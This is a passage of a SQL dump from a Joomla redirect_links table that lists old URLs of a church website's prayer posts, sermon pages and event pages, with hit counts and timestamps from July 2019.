(10937, 'https://www.lifeoasisinternationalchurch.org/index.php/183-2015-day-7/', NULL, '', '', 2, 0, '2019-07-03 03:57:42', '0000-00-00 00:00:00', 301),
(10938, 'https://www.lifeoasisinternationalchurch.org/index.php/184-2015-day-8/', NULL, '', '', 2, 0, '2019-07-03 03:57:49', '0000-00-00 00:00:00', 301),
(10939, 'https://www.lifeoasisinternationalchurch.org/index.php/185-2015-day-9/', NULL, '', '', 2, 0, '2019-07-03 03:57:56', '0000-00-00 00:00:00', 301),
(10940, 'https://www.lifeoasisinternationalchurch.org/index.php/187-2015-day-10/', NULL, '', '', 2, 0, '2019-07-03 03:58:02', '0000-00-00 00:00:00', 301),
(10941, 'https://www.lifeoasisinternationalchurch.org/index.php/188-2015-day-11/', NULL, '', '', 2, 0, '2019-07-03 03:58:10', '0000-00-00 00:00:00', 301),
(10942, 'https://www.lifeoasisinternationalchurch.org/index.php/189-2015-day-12/', NULL, '', '', 2, 0, '2019-07-03 03:58:18', '0000-00-00 00:00:00', 301),
(10943, 'https://www.lifeoasisinternationalchurch.org/index.php/190-2015-day-14/', NULL, '', '', 2, 0, '2019-07-03 03:58:24', '0000-00-00 00:00:00', 301),
(10944, 'https://www.lifeoasisinternationalchurch.org/index.php/191-2015-day-15/', NULL, '', '', 2, 0, '2019-07-03 03:58:31', '0000-00-00 00:00:00', 301),
(10945, 'https://www.lifeoasisinternationalchurch.org/index.php/192-2015-day-16/', NULL, '', '', 2, 0, '2019-07-03 03:58:38', '0000-00-00 00:00:00', 301),
(10946, 'https://www.lifeoasisinternationalchurch.org/index.php/193-2015-day-17/', NULL, '', '', 2, 0, '2019-07-03 03:58:46', '0000-00-00 00:00:00', 301),
(10947, 'https://www.lifeoasisinternationalchurch.org/index.php/194-2015-day-18/', NULL, '', '', 2, 0, '2019-07-03 03:58:53', '0000-00-00 00:00:00', 301),
(10948, 'https://www.lifeoasisinternationalchurch.org/index.php/195-2015-day-20/', NULL, '', '', 2, 0, '2019-07-03 03:59:03', '0000-00-00 00:00:00', 301),
(10949, 'https://www.lifeoasisinternationalchurch.org/index.php/196-2015-day-19/', NULL, '', '', 2, 0, '2019-07-03 03:59:10', '0000-00-00 00:00:00', 301),
(10950, 'https://www.lifeoasisinternationalchurch.org/index.php/197-2015-day-22/', NULL, '', '', 2, 0, '2019-07-03 03:59:20', '0000-00-00 00:00:00', 301),
(10951, 'https://www.lifeoasisinternationalchurch.org/index.php/198-2015-day-23/', NULL, '', '', 2, 0, '2019-07-03 03:59:27', '0000-00-00 00:00:00', 301),
(10952, 'https://www.lifeoasisinternationalchurch.org/index.php/199-2015-day-24/', NULL, '', '', 2, 0, '2019-07-03 03:59:38', '0000-00-00 00:00:00', 301),
(10953, 'https://www.lifeoasisinternationalchurch.org/index.php/200-2015-day-25/', NULL, '', '', 2, 0, '2019-07-03 03:59:48', '0000-00-00 00:00:00', 301),
(10954, 'https://www.lifeoasisinternationalchurch.org/index.php/201-2015-day-26/', NULL, '', '', 2, 0, '2019-07-03 03:59:56', '0000-00-00 00:00:00', 301),
(10955, 'https://www.lifeoasisinternationalchurch.org/index.php/202-2015-day-27/', NULL, '', '', 2, 0, '2019-07-03 04:00:05', '0000-00-00 00:00:00', 301),
(10956, 'https://www.lifeoasisinternationalchurch.org/index.php/203-2015-day-29/', NULL, '', '', 2, 0, '2019-07-03 04:00:13', '0000-00-00 00:00:00', 301),
(10957, 'https://www.lifeoasisinternationalchurch.org/index.php/204-2015-day-30/', NULL, '', '', 2, 0, '2019-07-03 04:00:22', '0000-00-00 00:00:00', 301),
(10958, 'https://www.lifeoasisinternationalchurch.org/index.php/205-2015-day-31/', NULL, '', '', 2, 0, '2019-07-03 04:00:29', '0000-00-00 00:00:00', 301),
(10959, 'https://www.lifeoasisinternationalchurch.org/index.php/206-2015-day-32/', NULL, '', '', 2, 0, '2019-07-03 04:00:35', '0000-00-00 00:00:00', 301),
(10960, 'https://www.lifeoasisinternationalchurch.org/index.php/207-2015-day-33/', NULL, '', '', 2, 0, '2019-07-03 04:00:42', '0000-00-00 00:00:00', 301),
(10961, 'https://www.lifeoasisinternationalchurch.org/index.php/208-2015-day-34/', NULL, '', '', 2, 0, '2019-07-03 04:00:50', '0000-00-00 00:00:00', 301),
(10962, 'https://www.lifeoasisinternationalchurch.org/index.php/209-2015-day-35/', NULL, '', '', 2, 0, '2019-07-03 04:01:00', '0000-00-00 00:00:00', 301),
(10963, 'https://www.lifeoasisinternationalchurch.org/index.php/210-2015-day-36/', NULL, '', '', 2, 0, '2019-07-03 04:01:08', '0000-00-00 00:00:00', 301),
(10964, 'https://www.lifeoasisinternationalchurch.org/index.php/211-2015-day-37/', NULL, '', '', 2, 0, '2019-07-03 04:01:19', '0000-00-00 00:00:00', 301),
(10965, 'https://www.lifeoasisinternationalchurch.org/index.php/212-2015-day-38/', NULL, '', '', 2, 0, '2019-07-03 04:01:27', '0000-00-00 00:00:00', 301),
(10966, 'https://www.lifeoasisinternationalchurch.org/index.php/213-2015-day-39/', NULL, '', '', 2, 0, '2019-07-03 04:01:35', '0000-00-00 00:00:00', 301),
(10967, 'https://www.lifeoasisinternationalchurch.org/index.php/214-2015-day-21/', NULL, '', '', 2, 0, '2019-07-03 04:01:41', '0000-00-00 00:00:00', 301),
(10968, 'https://www.lifeoasisinternationalchurch.org/index.php/215-2015-day-13-1/', NULL, '', '', 2, 0, '2019-07-03 04:01:48', '0000-00-00 00:00:00', 301),
(10969, 'https://www.lifeoasisinternationalchurch.org/index.php/216-2015-day-28/', NULL, '', '', 2, 0, '2019-07-03 04:01:57', '0000-00-00 00:00:00', 301),
(10970, 'https://www.lifeoasisinternationalchurch.org/index.php/217-2015-day-40/', NULL, '', '', 2, 0, '2019-07-03 04:02:06', '0000-00-00 00:00:00', 301),
(10971, 'https://www.lifeoasisinternationalchurch.org/index.php/219-2016-day-2/', NULL, '', '', 2, 0, '2019-07-03 04:02:15', '0000-00-00 00:00:00', 301),
(10972, 'https://www.lifeoasisinternationalchurch.org/index.php/221-2016-day-4/', NULL, '', '', 2, 0, '2019-07-03 04:02:24', '0000-00-00 00:00:00', 301),
(10973, 'https://www.lifeoasisinternationalchurch.org/index.php/222-2016-day-5/', NULL, '', '', 2, 0, '2019-07-03 04:02:31', '0000-00-00 00:00:00', 301),
(10974, 'https://www.lifeoasisinternationalchurch.org/index.php/223-2016-day-6/', NULL, '', '', 2, 0, '2019-07-03 04:02:39', '0000-00-00 00:00:00', 301),
(10975, 'https://www.lifeoasisinternationalchurch.org/index.php/224-2016-day-7/', NULL, '', '', 2, 0, '2019-07-03 04:02:47', '0000-00-00 00:00:00', 301),
(10976, 'https://www.lifeoasisinternationalchurch.org/index.php/225-2016-day-8/', NULL, '', '', 2, 0, '2019-07-03 04:02:57', '0000-00-00 00:00:00', 301),
(10977, 'https://www.lifeoasisinternationalchurch.org/index.php/226-2016-day-9/', NULL, '', '', 2, 0, '2019-07-03 04:03:04', '0000-00-00 00:00:00', 301),
(10978, 'https://www.lifeoasisinternationalchurch.org/index.php/227-2016-day-10/', NULL, '', '', 2, 0, '2019-07-03 04:03:13', '0000-00-00 00:00:00', 301),
(10979, 'https://www.lifeoasisinternationalchurch.org/index.php/228-2016-day-11/', NULL, '', '', 2, 0, '2019-07-03 04:03:22', '0000-00-00 00:00:00', 301),
(10980, 'https://www.lifeoasisinternationalchurch.org/index.php/229-2016-day-12/', NULL, '', '', 2, 0, '2019-07-03 04:03:32', '0000-00-00 00:00:00', 301),
(10981, 'https://www.lifeoasisinternationalchurch.org/index.php/230-2016-day-13/', NULL, '', '', 2, 0, '2019-07-03 04:03:40', '0000-00-00 00:00:00', 301),
(10982, 'https://www.lifeoasisinternationalchurch.org/index.php/231-2016-day-14/', NULL, '', '', 2, 0, '2019-07-03 04:03:50', '0000-00-00 00:00:00', 301),
(10983, 'https://www.lifeoasisinternationalchurch.org/index.php/232-2016-day-15/', NULL, '', '', 2, 0, '2019-07-03 04:03:58', '0000-00-00 00:00:00', 301),
(10984, 'https://www.lifeoasisinternationalchurch.org/index.php/233-2016-day-16/', NULL, '', '', 2, 0, '2019-07-03 04:04:06', '0000-00-00 00:00:00', 301),
(10985, 'https://www.lifeoasisinternationalchurch.org/index.php/234-2016-day-17/', NULL, '', '', 2, 0, '2019-07-03 04:04:14', '0000-00-00 00:00:00', 301),
(10986, 'https://www.lifeoasisinternationalchurch.org/index.php/235-2016-day-18/', NULL, '', '', 2, 0, '2019-07-03 04:04:23', '0000-00-00 00:00:00', 301),
(10987, 'https://www.lifeoasisinternationalchurch.org/index.php/236-2016-day-19/', NULL, '', '', 2, 0, '2019-07-03 04:04:32', '0000-00-00 00:00:00', 301),
(10988, 'https://www.lifeoasisinternationalchurch.org/index.php/237-2016-day-20/', NULL, '', '', 2, 0, '2019-07-03 04:04:39', '0000-00-00 00:00:00', 301),
(10989, 'https://www.lifeoasisinternationalchurch.org/index.php/238-2016-day-21/', NULL, '', '', 2, 0, '2019-07-03 04:04:46', '0000-00-00 00:00:00', 301),
(10990, 'https://www.lifeoasisinternationalchurch.org/index.php/239-2016-day-22/', NULL, '', '', 2, 0, '2019-07-03 04:04:56', '0000-00-00 00:00:00', 301),
(10991, 'https://www.lifeoasisinternationalchurch.org/index.php/240-2016-day-23/', NULL, '', '', 2, 0, '2019-07-03 04:05:03', '0000-00-00 00:00:00', 301),
(10992, 'https://www.lifeoasisinternationalchurch.org/index.php/241-2016-day-24/', NULL, '', '', 2, 0, '2019-07-03 04:05:12', '0000-00-00 00:00:00', 301),
(10993, 'https://www.lifeoasisinternationalchurch.org/index.php/242-day-4-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:05:21', '0000-00-00 00:00:00', 301),
(10994, 'https://www.lifeoasisinternationalchurch.org/index.php/243-day-5-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:05:31', '0000-00-00 00:00:00', 301),
(10995, 'https://www.lifeoasisinternationalchurch.org/index.php/244-day-6-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:05:37', '0000-00-00 00:00:00', 301),
(10996, 'https://www.lifeoasisinternationalchurch.org/index.php/245-day-6-of-21-days-fasting-and-prayer-october-2/', NULL, '', '', 2, 0, '2019-07-03 04:05:45', '0000-00-00 00:00:00', 301),
(10997, 'https://www.lifeoasisinternationalchurch.org/index.php/246-day-10-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:05:53', '0000-00-00 00:00:00', 301),
(10998, 'https://www.lifeoasisinternationalchurch.org/index.php/247-day-11-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:06:01', '0000-00-00 00:00:00', 301),
(10999, 'https://www.lifeoasisinternationalchurch.org/index.php/248-day-12-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:06:09', '0000-00-00 00:00:00', 301),
(11000, 'https://www.lifeoasisinternationalchurch.org/index.php/249-day-14-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:06:16', '0000-00-00 00:00:00', 301),
(11001, 'https://www.lifeoasisinternationalchurch.org/index.php/250-day-15-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:06:23', '0000-00-00 00:00:00', 301),
(11002, 'https://www.lifeoasisinternationalchurch.org/index.php/251-day-16-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:06:29', '0000-00-00 00:00:00', 301),
(11003, 'https://www.lifeoasisinternationalchurch.org/index.php/252-day-16-of-21-days-fasting-and-prayer-october-2/', NULL, '', '', 2, 0, '2019-07-03 04:06:36', '0000-00-00 00:00:00', 301),
(11004, 'https://www.lifeoasisinternationalchurch.org/index.php/253-day-16-of-21-days-fasting-and-prayer-october-3/', NULL, '', '', 2, 0, '2019-07-03 04:06:43', '0000-00-00 00:00:00', 301),
(11005, 'https://www.lifeoasisinternationalchurch.org/index.php/254-day-19-of-22-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:06:51', '0000-00-00 00:00:00', 301),
(11006, 'https://www.lifeoasisinternationalchurch.org/index.php/255-day-20-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:06:58', '0000-00-00 00:00:00', 301),
(11007, 'https://www.lifeoasisinternationalchurch.org/index.php/256-day-21-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:07:05', '0000-00-00 00:00:00', 301),
(11008, 'https://www.lifeoasisinternationalchurch.org/index.php/257-day-8-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:07:12', '0000-00-00 00:00:00', 301),
(11009, 'https://www.lifeoasisinternationalchurch.org/index.php/258-day-9-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:07:20', '0000-00-00 00:00:00', 301),
(11010, 'https://www.lifeoasisinternationalchurch.org/index.php/259-day-13-of-21-days-fasting-and-prayer-october/', NULL, '', '', 2, 0, '2019-07-03 04:07:29', '0000-00-00 00:00:00', 301),
(11011, 'https://www.lifeoasisinternationalchurch.org/index.php/260-day-22-of-22-days-fasting-and-prayer-october-2/', NULL, '', '', 2, 0, '2019-07-03 04:07:39', '0000-00-00 00:00:00', 301),
(11012, 'https://www.lifeoasisinternationalchurch.org/index.php/261-day-1-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:07:47', '0000-00-00 00:00:00', 301),
(11013, 'https://www.lifeoasisinternationalchurch.org/index.php/262-day-2-of-21-days-fasting-and-prayer-november-2/', NULL, '', '', 2, 0, '2019-07-03 04:07:54', '0000-00-00 00:00:00', 301),
(11014, 'https://www.lifeoasisinternationalchurch.org/index.php/263-day-3-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:08:02', '0000-00-00 00:00:00', 301),
(11015, 'https://www.lifeoasisinternationalchurch.org/index.php/264-day-4-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:08:09', '0000-00-00 00:00:00', 301),
(11016, 'https://www.lifeoasisinternationalchurch.org/index.php/265-day-5-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:08:17', '0000-00-00 00:00:00', 301),
(11017, 'https://www.lifeoasisinternationalchurch.org/index.php/266-day-6-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:08:24', '0000-00-00 00:00:00', 301),
(11018, 'https://www.lifeoasisinternationalchurch.org/index.php/267-day-7-of-21-days-fasting-and-prayer-november-2/', NULL, '', '', 2, 0, '2019-07-03 04:08:32', '0000-00-00 00:00:00', 301),
(11019, 'https://www.lifeoasisinternationalchurch.org/index.php/268-day-8-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:08:39', '0000-00-00 00:00:00', 301),
(11020, 'https://www.lifeoasisinternationalchurch.org/index.php/269-day-9-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:08:45', '0000-00-00 00:00:00', 301),
(11021, 'https://www.lifeoasisinternationalchurch.org/index.php/270-day-10-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:08:51', '0000-00-00 00:00:00', 301),
(11022, 'https://www.lifeoasisinternationalchurch.org/index.php/271-day-11-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:08:59', '0000-00-00 00:00:00', 301),
(11023, 'https://www.lifeoasisinternationalchurch.org/index.php/272-day-12-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:09:07', '0000-00-00 00:00:00', 301),
(11024, 'https://www.lifeoasisinternationalchurch.org/index.php/273-day-13-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:09:16', '0000-00-00 00:00:00', 301),
(11025, 'https://www.lifeoasisinternationalchurch.org/index.php/274-day-14-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:09:24', '0000-00-00 00:00:00', 301),
(11026, 'https://www.lifeoasisinternationalchurch.org/index.php/275-day-15-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:09:31', '0000-00-00 00:00:00', 301),
(11027, 'https://www.lifeoasisinternationalchurch.org/index.php/276-day-16-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:09:38', '0000-00-00 00:00:00', 301),
(11028, 'https://www.lifeoasisinternationalchurch.org/index.php/277-day-17-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:09:45', '0000-00-00 00:00:00', 301),
(11029, 'https://www.lifeoasisinternationalchurch.org/index.php/278-day-18-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:09:50', '0000-00-00 00:00:00', 301),
(11030, 'https://www.lifeoasisinternationalchurch.org/index.php/279-day-19-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:09:56', '0000-00-00 00:00:00', 301),
(11031, 'https://www.lifeoasisinternationalchurch.org/index.php/280-day-20-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:10:03', '0000-00-00 00:00:00', 301),
(11032, 'https://www.lifeoasisinternationalchurch.org/index.php/281-day-21-of-21-days-fasting-and-prayer-november/', NULL, '', '', 2, 0, '2019-07-03 04:10:10', '0000-00-00 00:00:00', 301),
(11033, 'https://www.lifeoasisinternationalchurch.org/index.php/59-2014-1/', NULL, '', '', 2, 0, '2019-07-03 04:10:16', '0000-00-00 00:00:00', 301),
(11034, 'https://www.lifeoasisinternationalchurch.org/index.php/60-prophetic-words-for-day-1/', NULL, '', '', 2, 0, '2019-07-03 04:10:22', '0000-00-00 00:00:00', 301),
(11035, 'https://www.lifeoasisinternationalchurch.org/index.php/62-prayer-focus-for-day-10/', NULL, '', '', 2, 0, '2019-07-03 04:10:35', '0000-00-00 00:00:00', 301),
(11036, 'https://www.lifeoasisinternationalchurch.org/index.php/63-2014-10/', NULL, '', '', 2, 0, '2019-07-03 04:10:42', '0000-00-00 00:00:00', 301),
(11037, 'https://www.lifeoasisinternationalchurch.org/index.php/64-prayer-focus-for-day-11/', NULL, '', '', 2, 0, '2019-07-03 04:10:48', '0000-00-00 00:00:00', 301),
(11038, 'https://www.lifeoasisinternationalchurch.org/index.php/75-prayer-focus-for-day-17/', NULL, '', '', 2, 0, '2019-07-03 04:11:49', '0000-00-00 00:00:00', 301),
(11039, 'https://www.lifeoasisinternationalchurch.org/index.php/79-prayer-focus-for-day-19/', NULL, '', '', 2, 0, '2019-07-03 04:12:13', '0000-00-00 00:00:00', 301),
(11040, 'https://www.lifeoasisinternationalchurch.org/index.php/80-2014-2/', NULL, '', '', 2, 0, '2019-07-03 04:12:17', '0000-00-00 00:00:00', 301),
(11041, 'https://www.lifeoasisinternationalchurch.org/index.php/81-prayer-focus-for-day-2/', NULL, '', '', 2, 0, '2019-07-03 04:12:22', '0000-00-00 00:00:00', 301),
(11042, 'https://www.lifeoasisinternationalchurch.org/index.php/guidelines/', NULL, '', '', 2, 0, '2019-07-03 04:14:02', '0000-00-00 00:00:00', 301),
(11043, 'https://lifeoasisinternationalchurch.org/gobc2019oworkshop/wp-admin', NULL, '', '', 1, 0, '2019-07-03 05:06:30', '0000-00-00 00:00:00', 301),
(11044, 'https://lifeoasisinternationalchurch.org/payment_optionscr.php', NULL, '', '', 1, 0, '2019-07-03 19:14:10', '0000-00-00 00:00:00', 301),
(11045, 'https://lifeoasisinternationalchurch.org/index.php/11-demo-articles/20-welcome/', NULL, '', '', 2, 0, '2019-07-04 00:49:25', '0000-00-00 00:00:00', 301),
(11046, 'https://lifeoasisinternationalchurch.org/index.php/18-loic/50-young-achievers/', NULL, '', '', 2, 0, '2019-07-04 00:49:37', '0000-00-00 00:00:00', 301),
(11047, 'https://lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/father-s-heart/', NULL, '', '', 2, 0, '2019-07-04 00:50:23', '0000-00-00 00:00:00', 301),
(11048, 'https://lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/father-s-heart/18-loic/50-young-achievers/', NULL, '', '', 2, 0, '2019-07-04 00:50:41', '0000-00-00 00:00:00', 301),
(11049, 'https://lifeoasisinternationalchurch.org/index.php/2012-11-09-09-57-10/seminar/', NULL, '', '', 2, 0, '2019-07-04 00:51:54', '0000-00-00 00:00:00', 301),
(11050, 'https://lifeoasisinternationalchurch.org/index.php/branches/18-loic/50-young-achievers/', NULL, '', '', 2, 0, '2019-07-04 00:52:51', '0000-00-00 00:00:00', 301),
(11051, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/10-preset-styles/', NULL, '', '', 2, 0, '2019-07-04 00:55:38', '0000-00-00 00:00:00', 301),
(11052, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/11-about-joomla?tmpl=component&print=1&page=/', NULL, '', '', 54, 0, '2019-07-04 00:56:36', '0000-00-00 00:00:00', 301),
(11053, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/20-welcome?tmpl=component&print=1&page=/', NULL, '', '', 54, 0, '2019-07-04 00:56:58', '0000-00-00 00:00:00', 301),
(11054, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/5-menu-options/', NULL, '', '', 2, 0, '2019-07-04 00:57:23', '0000-00-00 00:00:00', 301),
(11055, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/18-loic/50-young-achievers/', NULL, '', '', 2, 0, '2019-07-04 00:57:44', '0000-00-00 00:00:00', 301),
(11056, 'https://lifeoasisinternationalchurch.org/index.php/component/content/category/11-demo-articles/', NULL, '', '', 2, 0, '2019-07-04 00:58:05', '0000-00-00 00:00:00', 301),
(11057, 'https://lifeoasisinternationalchurch.org/index.php/component/content/category/12-sample-content/', NULL, '', '', 2, 0, '2019-07-04 00:58:30', '0000-00-00 00:00:00', 301),
(11058, 'https://lifeoasisinternationalchurch.org/index.php/gallery/', NULL, '', '', 2, 0, '2019-07-04 00:58:55', '0000-00-00 00:00:00', 301),
(11059, 'https://lifeoasisinternationalchurch.org/index.php/live-services/', NULL, '', '', 2, 0, '2019-07-04 00:59:18', '0000-00-00 00:00:00', 301),
(11060, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/', NULL, '', '', 2, 0, '2019-07-04 00:59:38', '0000-00-00 00:00:00', 301),
(11061, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/serie/1?start=20/', NULL, '', '', 28, 0, '2019-07-04 01:00:37', '0000-00-00 00:00:00', 301),
(11062, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/10-grace-2/', NULL, '', '', 2, 0, '2019-07-04 01:01:39', '0000-00-00 00:00:00', 301),
(11063, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/11-grace-3/', NULL, '', '', 2, 0, '2019-07-04 01:02:02', '0000-00-00 00:00:00', 301),
(11064, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/12-manifesting-spiritual-gifts/', NULL, '', '', 2, 0, '2019-07-04 01:02:21', '0000-00-00 00:00:00', 301),
(11065, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/14-entering-into-winning-position-2/', NULL, '', '', 2, 0, '2019-07-04 01:03:30', '0000-00-00 00:00:00', 301),
(11066, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/15-entering-into-winning-position-3/', NULL, '', '', 2, 0, '2019-07-04 01:03:52', '0000-00-00 00:00:00', 301),
(11067, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/16-entering-into-winning-position-4/', NULL, '', '', 2, 0, '2019-07-04 01:04:15', '0000-00-00 00:00:00', 301),
(11068, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/17-entering-into-winning-position-5/', NULL, '', '', 2, 0, '2019-07-04 01:04:36', '0000-00-00 00:00:00', 301),
(11069, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/18-army-of-the-lord-1/', NULL, '', '', 2, 0, '2019-07-04 01:05:01', '0000-00-00 00:00:00', 301),
(11070, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/19-army-of-the-lord-2/', NULL, '', '', 2, 0, '2019-07-04 01:05:17', '0000-00-00 00:00:00', 301),
(11071, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/2-building-a-bilblical-relationship-with-the-word-of-god-2/', NULL, '', '', 2, 0, '2019-07-04 01:05:35', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(11072, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/20-army-of-the-lord-3/', NULL, '', '', 2, 0, '2019-07-04 01:05:59', '0000-00-00 00:00:00', 301),
(11073, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/21-dealing-with-buts-in-your-life/', NULL, '', '', 2, 0, '2019-07-04 01:06:22', '0000-00-00 00:00:00', 301),
(11074, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/22-dealing-with-buts-in-your-life-2/', NULL, '', '', 2, 0, '2019-07-04 01:06:42', '0000-00-00 00:00:00', 301),
(11075, 'https://lifeoasisinternationalchurch.org/index.php/partnership/18-loic/50-young-achievers/', NULL, '', '', 2, 0, '2019-07-04 01:07:23', '0000-00-00 00:00:00', 301),
(11076, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/dream-centre-ordained-pastors/', NULL, '', '', 2, 0, '2019-07-04 01:07:50', '0000-00-00 00:00:00', 301),
(11077, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/dream-centre-ordained-pastors/18-loic/50-young-achievers/', NULL, '', '', 2, 0, '2019-07-04 01:08:14', '0000-00-00 00:00:00', 301),
(11078, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/rev-oyenike-areogun/', NULL, '', '', 2, 0, '2019-07-04 01:08:39', '0000-00-00 00:00:00', 301),
(11079, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/rev-oyenike-areogun/18-loic/50-young-achievers/', NULL, '', '', 2, 0, '2019-07-04 01:09:08', '0000-00-00 00:00:00', 301),
(11080, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church/', NULL, '', '', 2, 0, '2019-07-04 01:09:26', '0000-00-00 00:00:00', 301),
(11081, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church-2/', NULL, '', '', 2, 0, '2019-07-04 01:09:57', '0000-00-00 00:00:00', 301),
(11082, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church-2/18-loic/50-young-achievers/', NULL, '', '', 2, 0, '2019-07-04 01:10:22', '0000-00-00 00:00:00', 301),
(11083, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/the-church/18-loic/50-young-achievers/', NULL, '', '', 2, 0, '2019-07-04 01:10:49', '0000-00-00 00:00:00', 301),
(11084, 'https://lifeoasisinternationalchurch.org/index.php/videos/', NULL, '', '', 2, 0, '2019-07-04 01:11:14', '0000-00-00 00:00:00', 301),
(11085, 'https://lifeoasisinternationalchurch.org/index.php/videos/18-loic/50-young-achievers/', NULL, '', '', 2, 0, '2019-07-04 01:11:37', '0000-00-00 00:00:00', 301),
(11086, 'https://lifeoasisinternationalchurch.org/workshopstreaming', NULL, '', '', 1, 0, '2019-07-04 07:03:16', '0000-00-00 00:00:00', 301),
(11087, 'https://lifeoasisinternationalchurch.org/streaming radio', NULL, '', '', 3, 0, '2019-07-04 13:42:58', '0000-00-00 00:00:00', 301),
(11088, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_sermonspeaker&view=sermons&itemid=190', NULL, '', '', 1, 0, '2019-07-06 18:40:28', '0000-00-00 00:00:00', 301),
(11089, 'https://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/49-prophetic-words-for-day-39', NULL, '', '', 7, 0, '2019-07-06 18:52:11', '0000-00-00 00:00:00', 301),
(11090, 'https://www.lifeoasisinternationalchurch.org/component/content/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&itemid=189', NULL, '', '', 1, 0, '2019-07-07 06:02:51', '0000-00-00 00:00:00', 301),
(11091, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/29/34/', NULL, '', '', 1, 0, '2019-07-08 04:43:23', '0000-00-00 00:00:00', 301),
(11092, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/30/34/', NULL, '', '', 1, 0, '2019-07-08 04:43:30', '0000-00-00 00:00:00', 301),
(11093, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/05/31/34/', NULL, '', '', 1, 0, '2019-07-08 04:43:37', '0000-00-00 00:00:00', 301),
(11094, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/01/34/', NULL, '', '', 1, 0, '2019-07-08 04:43:45', '0000-00-00 00:00:00', 301),
(11095, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/02/34/', NULL, '', '', 1, 0, '2019-07-08 04:43:52', '0000-00-00 00:00:00', 301),
(11096, 'https://www.lifeoasisinternationalchurch.org/gobc/events/day.listevents/2001/06/03/34/', NULL, '', '', 1, 0, '2019-07-08 04:43:59', '0000-00-00 00:00:00', 301),
